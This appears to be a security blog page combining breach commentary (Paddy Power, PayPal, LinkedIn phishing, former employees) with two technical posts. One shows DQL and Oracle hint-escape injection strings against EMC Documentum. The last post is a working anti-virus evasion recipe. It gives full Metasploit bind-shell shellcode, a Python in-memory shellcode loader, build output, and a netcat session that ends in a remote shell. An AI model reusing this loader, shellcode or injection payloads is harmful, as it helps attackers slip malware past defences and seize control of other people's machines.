Skip to content

Paddy Power Notifies Customers of Data Breach… Four Years Late

by

Irish bookmaker Paddy Power has admitted that personal details of more than 600,000 customers were stolen in a cyber-attack that occurred in 2010. The company revealed that it was aware of an attack on its system four years ago but failed to inform customers of the security breach.

Data including names, usernames, postal addresses, email addresses, phone numbers, dates of birth as well as security questions and answers were stolen, although it’s not thought that financial information was accessed or that any customer accounts were violated. The company was informed in May this year that a man in Canada had a large database of customer information, but it remains unclear how long Paddy Power has known about this security breach, or whether they knew the full extent of it.

Failing to inform people of a data leak in good time leaves customers exposed to the danger of identity theft. Any security breach, no matter how big or small, should be taken seriously by organisations and communicated to customers to enable them to take necessary steps to minimise the damage caused to them personally. It’s also essential that an organisation properly investigates how the data was stolen and closes off any vulnerability that may have enabled the theft.

In this instance the information stolen placed affected account holders at severe risk of further social engineering attacks and identity theft. While a security breach will always draw negative attention it is always better to communicate quickly and openly to restore customer trust and ensure that customers are better protected against further attacks.

Documentum DQL Injection / ESA-2014-046

Before naming your vulnerabilities became cool (Heartbleed anyone?) I discovered an issue on the EMC Documentum software and internally called it “injeception”. Now that naming your vulnerability is so mainstream I will just call it ESA-2014-046 (that, surprisingly, matches with the name used by the vendor!)

But why that name? Well, it’s 2014 and they have released other 45 vulner…. Oh, you mean the injeception? Well, because if you do an injection inside an injection; let me explain to you how it works:

  • The EMC Documentum software uses an abstraction layer to allow the software to use any backend database server, such as Oracle or MSSQL. This layer uses their own query language (DQL, from Documentum Query Language) and this the first part for the injeception to work.
  • I found an issue (CVE-2014-2508) that allows me to inject DQL at the end of a query. Descriptive error messages also helped to understand what was happening on the backend.
    • We are now at the DQL level (moving from the app level that we were before) and we are still confined to the ORM system that EMC has in place to prevent users from one unit/department accessing files from other departments.
    • Reviewing the DQL Reference Manual I found references to two interesting keywords: ENABLE and ORACLE. The use of both can be seen in the page 323 (Passthrough hits) of the manual. It essentially allows insertion of custom Oracle (and presumably MSSQL, but didn’t have the chance to try that) SQL into the final query that is generated by the Documentum software. We have our third jump! (And I think this one is CVE-2014-2507 but I haven’t been credited for this one, so I am not sure if I am right assuming this…)
      • Now we find ourselves in an interesting position. We are inside an Oracle hint. For those who don’t know (I didn’t at the time) hints are a special set of keywords that you can write between the SELECT and the first parameter of the query to improve the performance. Like this:
SELECT /* HINT */ 1 from dual;
      • So… can we escape from the hint syntax and execute code? Sure thing! If we write ‘*/’ Documentum passed it unescaped to the SQL query and we are able to inject any SQL query from our original DQL injection. Let’s go up a level again on this injection to construct the final valid query.
      • First we need to make our Oracle query:
*/ user FROM dual--
  • Now we need to add it into a valid DQL query:
ENABLE(ORACLE('*/user FROM DUAL--'))
  • Finally, we have to add that string at the end of our DQL Injection:
table_field from valid_table ENABLE(ORACLE('*/user FROM DUAL--'));-- 
  • As you can see we need a valid table and a valid field but I got those from the debug messages, documentation might also help.

This way we have moved from a DQL Injection (CVE-2014-2508) to a shell injection (CVE-2014-2507?) and execute Oracle queries. But what about CVE-2014-2506? Well, the user running those Oracle queries does not have any privilege limitations so it can access any information, no matter what department or OU the user executing the DQL is member of, they will access even configuration details from the server.

Size Doesn’t Matter to Cyber-Attackers

by

A new report released by Damballa this week revealed that the average enterprise will have 18.5% of machines infected with malware, with the figure unchanged across larger and smaller organisations.

While the report focussed on enterprise sized businesses it is safe to say malware has no concept of business size, it merely seeks out vulnerabilities and exploits them, meaning any organisation that stores data is a potential target. This means that anyone from a small local run business to a large multi-national corporation is exposed to the same threat level with their risk level depending on how robust their cyber-security defences are.

A common trap to fall into, particularly for smaller businesses, is that they believe that they have nothing worth having for cyber-criminals to target and don’t need to worry about cyber-security. Equally some organisations hold the misconception that by purchasing and implementing a security product, then their business is inoculated against internet-borne threats.

This latest report, however, highlights that business of all sizes need to be aware that security is an ongoing process and that threat avoidance goes far beyond just having products in place. This includes ensuring that staff are made aware of best practice and receive training on common threats such as social engineering and phishing attacks.

There’s No Excuse for Failing to Fix Simple Security Flaws

by

Protecting a business and its customers against cyber-attack and data loss is a multi-faceted, relentless task that requires careful consideration and robust systems and policies. Some elements of this are more complex than others but ultimately those challenges can, and must, be overcome.

What there is no excuse for, however, is a business knowing about, and failing to rectify, a simple, easily fixable flaw in its cyber-security as seen with PayPal this week. Having been alerted by an Australian hacker that a flaw existed in some aspects of its two-factor authentication system, making it possible for it to be by-passed, in June, the hacker went public with the flaw this week as it had still not been resolved.

A fundamental flaw, such as this, in how the authentication is handled, is easy to avoid and shouldn’t have been allowed to occur in the first place and what’s more it is simple to fix. Two-factor authentication, when properly executed, can add invaluable layers of security, providing the user chooses a strong password.

It is critical that any flaw, whether it be simple or complex, large or small, is addressed quickly and efficiently to provide businesses and their customers with maximum security at all times. In this instance it would appear PayPal has been lucky that it has not suffered a major breach as it works to fix the issue. However businesses can’t, and shouldn’t, rely on good fortune as a method of cyber-security.

LinkedIn Phishing Trips Pose Threat to Business – Not just Individuals

by

Hackers have once again been targeting LinkedIn using new phishing emails targeting users, which aim to trick recipients into clicking on a link by claiming that their LinkedIn accounts have been blocked due to inactivity. While on the face of things this may seem like an issue for individuals with no cause for concern for businesses, nothing could be further from the truth.

While LinkedIn provides a rich source of personal information for attackers it is how this information is used, once it is obtained, that should be a concern for businesses.  Armed with personal data, including where an individual works, job role and contact details, hackers will look to further exploit this in social engineering attacks, which could prove costly both to the individuals and the organizations they work for.

Phishing emails continue to be the most common source of information for social engineering attacks and this further highlights why educating employees about the risks posed is of vital importance.  By providing extensive education of data loss prevention organisations will significantly reduce the chance of an attack or their employees unwittingly handing ammunition to hackers to use to mount attacks against an organisations data.

Ex-Employees Pose Greater Threat Than Expected

by

New research published by IS Decisions this week suggests that more than a third of former employees still have access to company data and/or systems after they have left an organisation with nearly 10% of employees polled admitting they had used their access/data rights after they had left an employer.

The finding of the report suggest that to many businesses have a culture of “out of sight, out of mind” where employee data access is concerned – a worrying trend given such attitudes can drastically increase the scope for data loss.

The report makes five main recommendations, including better education on security among management; restricting concurrent access to systems; considering harsh penalties for transgressions; restricting network access to departments at certain times; and making the process of securely delegating work (and access to systems) a lot easier.

While these recommendations will certainly help tackle the issue we believe that it should also include an effective DLP strategy that covers not only types of data and where it is stored, but also which employees have permission to access it, from new joiners to contractors and those leaving the company. Organisations should be conducting regular audits to maintain best practice, and where applicable, revoke employee access. The potential risks that organisations expose themselves to by not considering employee permissions and access points can’t be understated – and neglecting to deploy vigilant post-termination processes can leave companies wide open.

Execute Shellcode, Bypassing Anti-Virus…

by

Hello,

I am going to demonstrate a little trick to allow you to bypass anti-virus and execute shellcode, this is a publicly known trick that I did not discover. The shellcode I am going to use for this example is the common Metasploit Windows Bind TCP shell, however any shellcode can be used, I have simply chosen this one for simplicity.

As I’m sure you’re all aware, the standard Metasploit Windows Bind shell will be flagged by the most basic of anti-virus solutions.

So, first of all let’s generate a Metasploit payload:

root@kali:~# msfpayload windows/shell_bind_tcp LPORT=31337 C | grep -v 'unsigned' | grep -v '*' | sed s'/"//g' | sed s'/;//g' | tr "\n" "," | sed s'/,//g' && echo ""
\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x31\xdb\x53\x68\x02\x00\x7a\x69\x89\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5
root@kali:~#

Copy the line of shellcode that gets returned, we will paste it into the binary later. Be aware, if you do change the payload the above command will not work as it is specific to that payload (for extracting the opcodes from the msfpayload output).

Now in order to do this you must have Python and PyInstaller installed. I will not cover how to install these as their respective sites do it well.

The following piece of Python code takes shellcode as input and moves it into the newly created memory space, finally executing it and bypassing anti-virus. Using VirtualAlloc, RtlMoveMemory, CreateThread and WaitForSingleObject we achieve this. Here is the Python code:

#!C:\Python27\python.exe

from ctypes import *

# Grab shellcode from the user so its not hardcoded.
sc = bytearray(input("Paste the shellcode inside single quotes:\n\n"))
print "\n\nRunning shellcode in memory...\n\n"

# Reserves or commits a region of pages in the virtual address space of the calling process.
pointer = windll.kernel32.VirtualAlloc(c_int(0),
                                   c_int(len(sc)),
                                   c_int(0x3000),
                                   c_int(0x40))
 
buffer = (c_char * len(sc)).from_buffer(sc)
 
# The RtlMoveMemory routine copies the contents of a source memory block to a destination 
# memory block, and supports overlapping source and destination memory blocks.
windll.kernel32.RtlMoveMemory(c_int(pointer),
                              buffer,
                              c_int(len(sc)))
# Creates a thread to execute within the virtual address space of the calling process.
ht = windll.kernel32.CreateThread(c_int(0),
                                  c_int(0),
                                  c_int(pointer),
                                  c_int(0),
                                  c_int(0),
                                  pointer(c_int(0)))
# Waits until the specified object is in the signaled state or the time-out interval elapses. 
windll.kernel32.WaitForSingleObject(c_int(ht), c_int(-1))

print "Completed, you're shellcode has been injected into memory and should be running..."

Take the above Python script and compile it to an win32 executable using PyInstaller:

C:\Users\mike.evans\Desktop\AV>c:\Python27\Scripts\pyinstaller.exe -F crypter2.py
82 INFO: wrote C:\Users\mike.evans\Desktop\AV\crypter2.spec
117 INFO: Testing for ability to set icons, version resources...
247 INFO: ... resource update available
252 INFO: UPX is not available.
283 INFO: Processing hook hook-os
424 INFO: Processing hook hook-time
430 INFO: Processing hook hook-cPickle
510 INFO: Processing hook hook-_sre
667 INFO: Processing hook hook-cStringIO
780 INFO: Processing hook hook-encodings
799 INFO: Processing hook hook-codecs
1440 INFO: Extending PYTHONPATH with C:\Users\mike.evans\Desktop\AV
1440 INFO: checking Analysis
1441 INFO: building Analysis because out00-Analysis.toc non existent
1441 INFO: running Analysis out00-Analysis.toc
1444 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable
1917 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_none ...
1918 INFO: Found manifest C:\Windows\WinSxS\Manifests\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91.manifest
1925 INFO: Searching for file msvcr90.dll
1927 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcr90.dll
1927 INFO: Searching for file msvcp90.dll
1928 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcp90.dll
1930 INFO: Searching for file msvcm90.dll
1930 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcm90.dll
2058 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\_pyi_bootstrap.py
2078 INFO: Processing hook hook-os
2102 INFO: Processing hook hook-site
2128 INFO: Processing hook hook-encodings
2260 INFO: Processing hook hook-time
2267 INFO: Processing hook hook-cPickle
2351 INFO: Processing hook hook-_sre
2500 INFO: Processing hook hook-cStringIO
2625 INFO: Processing hook hook-codecs
3140 INFO: Processing hook hook-pydoc
3322 INFO: Processing hook hook-email
3401 INFO: Processing hook hook-httplib
3461 INFO: Processing hook hook-email.message
3560 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\pyi_importers.py
3628 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\pyi_archive.py
3693 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\pyi_carchive.py
3752 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\pyi_os_path.py
3763 INFO: Analyzing crypter2.py
3849 INFO: Hidden import 'codecs' has been found otherwise
3851 INFO: Hidden import 'encodings' has been found otherwise
3852 INFO: Looking for run-time hooks
4213 INFO: Using Python library C:\Windows\system32\python27.dll
4450 INFO: Warnings written to C:\Users\mike.evans\Desktop\AV\build\crypter2\warncrypter2.txt
4470 INFO: checking PYZ
4471 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing
4473 INFO: building PYZ (ZlibArchive) out00-PYZ.toc
5601 INFO: checking PKG
5604 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing
5605 INFO: building PKG (CArchive) out00-PKG.pkg
6776 INFO: checking EXE
6777 INFO: rebuilding out00-EXE.toc because crypter2.exe missing
6779 INFO: building EXE from out00-EXE.toc
6818 INFO: Appending archive to EXE C:\Users\mike.evans\Desktop\AV\dist\crypter2.exe

Now we have the binary, lets check VirusTotal and see what it scores:

vt

Excellent, it passes all anti-virus checks. Let’s drop this binary onto the target machine and paste in the shellcode from earlier:

C:\Users\mike.evans\Desktop\AV\dist>crypter2.exe
Paste the shellcode inside single quotes:

'\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x31\xdb\x53\x68\x02\x00\x7a\x69\x89\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5'

Running shellcode in memory...

Excellent, so the binary didn’t get flagged and it executed our shellcode in memory. If we try connecting to the target on port 31337 we should get a shell:

dustys-air:~ dusty$ nc 172.16.40.208 31337
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\mike.evans\Desktop\AV\dist>whoami
whoami
win-2q626uv3pte\mike.evans

C:\Users\mike.evans\Desktop\AV\dist>

This technique can be handy in certain situations where you just want to drop a payload and the darn AV keeps picking it up.

Follow

Get every new post delivered to your Inbox.

Join 128 other followers